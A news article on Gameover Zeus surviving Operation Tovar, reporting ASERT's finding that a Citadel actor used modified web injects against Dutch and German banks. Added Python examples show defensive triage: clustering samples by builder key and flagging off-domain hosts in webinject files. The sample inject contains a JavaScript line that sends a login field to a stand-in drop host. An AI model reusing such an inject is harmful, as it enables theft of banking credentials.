
Gameover Trojan rises from the dead


Despite the takedown of Gameover Zeus last month, security researchers say that a small group of cyber-criminals is still using the Trojan, paired with a tweaked set of Citadel web injects, to steal banking credentials.


Security researchers at Arbor Networks' ASERT division reveal in a new blog post how a threat actor that had been running a Citadel campaign (Citadel being the Zeus-derived botnet whose infrastructure Microsoft disrupted in June 2013) is now using a tweaked variant of that Citadel code alongside the Gameover Trojan to target a number of small European banks.

A threat actor can start a Citadel campaign by buying the builder software, generating the malware with it and distributing the result to infect machines and turn a profit. Each copy of the builder carries a login key that identifies that specific copy, and the key is copied into every binary the builder generates, so a sample found in the wild can be linked back to the builder copy, and therefore the customer, that produced it.
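The attribution pivot described above, as an added example that is not ASERT's or the article's own code: given a set of samples, pull the builder login key out of each one, cluster the samples by key, and raise an alert when a key on an analyst's watchlist turns up. It assumes, since the page does not say how the key is stored, that the sample's configuration has already been decoded and that the key appears in it as a 32-character upper-case hex string behind a `login_key=` marker; the sample blobs are constructed, and only the watchlist key is taken from the article.

```python
import re
from collections import defaultdict

# ASSUMPTION (not stated on the page): after the Citadel config has been
# decoded, the builder login key appears as "login_key=<32 hex chars>".
LOGIN_KEY_RE = re.compile(rb"login_key=([0-9A-F]{32})")

# Keys that warrant an alert. The first is the key ASERT tied to the
# Gameover third-party campaign; add keys from your own tracking here.
WATCHLIST = {"5CB682C10440B2EBAF9F28C1FE438468"}


def extract_login_key(decoded_config: bytes):
    """Return the builder login key found in a decoded config, or None."""
    match = LOGIN_KEY_RE.search(decoded_config)
    return match.group(1).decode("ascii") if match else None


def cluster_by_builder(samples: dict) -> dict:
    """Map builder login key -> sorted sample names that share it.

    Samples with no recognisable key land under the None entry so they
    are not silently dropped from the report.
    """
    clusters = defaultdict(list)
    for name, blob in samples.items():
        clusters[extract_login_key(blob)].append(name)
    return {key: sorted(names) for key, names in clusters.items()}


def watchlist_hits(clusters: dict) -> dict:
    """Subset of the clusters whose builder key is on the watchlist."""
    return {key: names for key, names in clusters.items() if key in WATCHLIST}


# Constructed decoded-config fragments standing in for real samples.
SAMPLES = {
    "sample_a.bin": b"\x00cfg\x00login_key=5CB682C10440B2EBAF9F28C1FE438468\x00url_config=...",
    "sample_b.bin": b"login_key=5CB682C10440B2EBAF9F28C1FE438468\x00...",
    "sample_c.bin": b"login_key=0123456789ABCDEF0123456789ABCDEF\x00",
    "not_citadel.bin": b"MZ\x90\x00 no builder key in here",
}

if __name__ == "__main__":
    clusters = cluster_by_builder(SAMPLES)
    for key, names in clusters.items():
        print(key, names)
    print("watchlist hits:", watchlist_hits(clusters))
```

Two samples sharing a key came from the same builder copy; that is the link Microsoft used to name defendants in its Citadel suit and the link ASERT used to show that this particular key was not among them.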

The key question now is how the Gameover Trojan, a favourite tool of criminals targeting financial institutions, is still in operation.

On 2 June, the FBI, the NCA, Europol's EC3 and various other law enforcement agencies joined forces in ‘Operation Tovar’ to disrupt the Gameover Zeus and CryptoLocker botnets, which had infected some 500,000 PCs.

The agencies took control of Gameover Zeus's peer-to-peer (P2P) infrastructure, but warned that the same cyber-criminals could be back on new infrastructure within four to six weeks.

Investigative reporter and independent security researcher Brian Krebs suggests that “the curators of Gameover also have reportedly loaned out sections of their botnet to vetted third parties who have used them for a variety of purposes”, and this appears to be backed up by ASERT's findings.

“Analysing webinject data from the global configuration file that was being distributed on the peer-to-peer network shortly before its takedown on June 2, 2014, it looks as if the threat actor behind Citadel login key 5CB682C10440B2EBAF9F28C1FE438468 had joined the ranks of Gameover's coveted third parties,” reads the analysis from ASERT security researcher Dennis Schwarz. “Checking historical versions of the config shows that this collaboration goes back to at least January 2014.”

Crucially, this builder key was not associated with the 82 parties accused in Microsoft's Citadel lawsuit last year.

The company adds that the threat actor has modified the Citadel code to work with Gameover, targeting “a small set of banks in Netherlands and Germany”, and suggests that the group may have moved to Gameover to steal banking credentials in late 2013, when Citadel activity was in decline.

In this latest case Citadel's core code is unchanged; what has been modified is the set of web injects, the HTML and JavaScript the malware inserts into a bank's pages inside the victim's browser.

“So far, it seems as if this threat actor has escaped the clutches of the great Citadel take-down and, since the drop site is still receiving stolen credentials, has evaded the Zeus Gameover take-down as well.”

Schwarz added in an email to SCMagazineUK.com: “While the exact details haven't been released, I speculate that Operation Tovar took over/took down the domain generation algorithm (DGA) component and a set of, in Gameover parlance, super nodes or proxy nodes. Among other functions, these special nodes were the main channel for funnelling stolen banking credentials to the threat actors.

“What I found interesting from the third-party campaign mentioned in the blog is that it used an out-of-band channel (built into the particular set of web injects referenced) to exfiltrate stolen data, outside of the main conduit. This secondary channel was definitely still collecting stolen credentials from victims infected with Gameover post-Operation Tovar on June 2.

“One of the reasons why Zeus-based malware is so popular is that web injects can be retrofitted from one variant to the next fairly easily. Based on the web injects mentioned in the blog, I believe this particular threat actor was using both Citadel and their relationship with the Zeus Gameover crew to target the set of banks in the Netherlands and Germany.”
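The two points above, that web injects are portable between Zeus variants and that this actor's injects carried their own exfiltration channel, are easiest to see by reading an inject file the way a config analyst does. The following is an added example, not ASERT's tooling or anything from the article: it parses the plain-text webinject format shared by Zeus, Citadel and Gameover (`set_url` followed by `data_before`, `data_inject` and `data_after` sections, each closed by `data_end`) and flags any inject whose injected content references a host outside the targeted bank's domain, which is exactly what a secondary drop site looks like in a config. The inject file, the bank hostnames and the drop-site hostname are all constructed, and the "same domain" test uses a deliberately crude last-two-labels rule rather than a public-suffix list.

```python
import re
from urllib.parse import urlparse

# Constructed webinject file in the Zeus-family text format. Bank and
# drop-site hostnames are made up; only the format is real.
SAMPLE_INJECTS = """\
set_url https://online.bank-a.example/login* GP
data_before
<input type="submit"
data_end
data_inject
<script src="https://online.bank-a.example/js/ui.js"></script>
<script>
new Image().src = "https://cdn-stats.example/i.php?u=" + document.forms[0].user.value;
</script>
data_end
data_after
data_end

set_url https://www.bank-b.example/* G
data_before
</head>
data_end
data_inject
<script src="https://www.bank-b.example/assets/app.js"></script>
data_end
data_after
data_end
"""

SECTIONS = ("data_before", "data_inject", "data_after")
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")


def parse_webinjects(text: str) -> list:
    """Parse set_url rules into dicts with url, flags and the three sections."""
    rules, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if section is not None:            # inside a data_* block
            if line == "data_end":
                section = None
            else:
                current[section].append(raw)
            continue
        if line.startswith("set_url"):
            parts = line.split(None, 2)
            current = {"url": parts[1], "flags": parts[2] if len(parts) > 2 else ""}
            current.update({name: [] for name in SECTIONS})
            rules.append(current)
        elif line in SECTIONS and current is not None:
            section = line
    return rules


def registrable_host(host: str) -> str:
    """Crude registrable-domain guess: last two labels. Good enough for a
    triage pass; use a public-suffix list for anything production-grade."""
    labels = host.lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def find_out_of_band_hosts(rule: dict) -> list:
    """Hosts referenced by the injected content that fall outside the target
    bank's domain: candidate secondary exfiltration channels."""
    pattern = rule["url"] if "://" in rule["url"] else "https://" + rule["url"]
    target = (urlparse(pattern).hostname or "").replace("*", "")
    injected = "\n".join(rule["data_inject"])
    hosts = {urlparse(u).hostname for u in URL_RE.findall(injected)}
    return sorted(h for h in hosts
                  if h and registrable_host(h) != registrable_host(target))


def flag_exfil_injects(text: str) -> dict:
    """Map set_url pattern -> off-domain hosts, for rules that have any."""
    flagged = {}
    for rule in parse_webinjects(text):
        hosts = find_out_of_band_hosts(rule)
        if hosts:
            flagged[rule["url"]] = hosts
    return flagged


if __name__ == "__main__":
    for url, hosts in flag_exfil_injects(SAMPLE_INJECTS).items():
        print(f"{url}: injected content talks to {', '.join(hosts)}")
```

Because the format carries no bot-specific state, the same inject block drops unchanged into a Citadel or a Gameover config, which is the portability Schwarz describes; and because the exfiltration URL lives inside the inject rather than in the bot's C&C settings, seizing the P2P network and its proxy nodes does nothing to stop it. Any off-domain host the scan turns up is a candidate for blocking and for a takedown request in its own right.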

Kenneth Bechtel, malware research analyst at Tenable, said that this latest case is a classic example where takedowns can't keep up with the new strains of malware.

“Considering that malware is often used as a profit centre, this development comes as no surprise,” he said to SCMagazineUK.com.

“Major takedowns such as the Citadel campaign and even Zeus net have had positive results. However, with the sheer volume of variants being controlled, it is no real surprise that a few very small organisations were targeted, slipping through the cracks.”

“Since this one has popped up on someone's radar, I'm confident it will be dealt with quickly. Dealing with malware and botnet Command and Control (C&C) is very much like playing whack-a-mole: while the industry does its best to be proactive, we cannot predict what server will be compromised next and leveraged for C&C, and can only react accordingly. As long as malware is being sold on the black market and used as a profit generator, we will continue to see this type of one-off attack.”


